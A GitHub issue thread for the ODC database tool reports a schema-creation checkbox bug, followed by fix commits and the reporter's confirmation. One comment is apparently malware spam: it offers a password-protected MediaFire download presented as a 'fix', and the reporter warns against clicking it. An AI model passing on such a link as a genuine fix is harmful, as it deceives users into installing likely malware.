### ISSUE TITLE
[Bug]:When you create a schema, you cannot unselect Benchmark Database by default

### ISSUE THREAD

**Issue by qymsummer** [oceanbase/odc#3225]
### ODC version

ODC 4.3.2

### OB version

no related

### What happened?

Click the box button, you can't check or uncheck it, but click the database name, clear or select all button, you can check or uncheck it
![image](https://github.com/user-attachments/assets/d3afc4a9-0e16-4303-8399-b5fabc25cb46)
![image](https://github.com/user-attachments/assets/c077da69-fde2-4509-800b-9bde4ecc48df)

### What did you expect to happen?

When you create a schema, you cannot unselect Benchmark Database by default

### How can we reproduce it (as minimally and precisely as possible)?

Click the box button, you can't check or uncheck it, but click the database name, clear or select all button, you can check or uncheck it

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qymsummer** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

Don't click Don't click Don't click

**Comment by HSunboy** [comment]
Fixed In Commit [2c524061531005196c4e543a39c6b662cac1714c](https://github.com/oceanbase/odc-client/commit/2c524061531005196c4e543a39c6b662cac1714c)
            ------
            畅晚
            Mon Sep 2 10:10:14 2024 +0800

**Comment by HSunboy** [comment]
Fixed In Commit [d6ced46754053d5e7c1308995c8014843ea30b6b](https://github.com/oceanbase/odc-client/commit/d6ced46754053d5e7c1308995c8014843ea30b6b)
            ------
            畅晚
            Wed Sep 11 16:57:54 2024 +0800

**Comment by qymsummer** [comment]
![Image](https://github.com/user-attachments/assets/b858e94d-95a0-48ce-b199-04fa062ed492)
pass
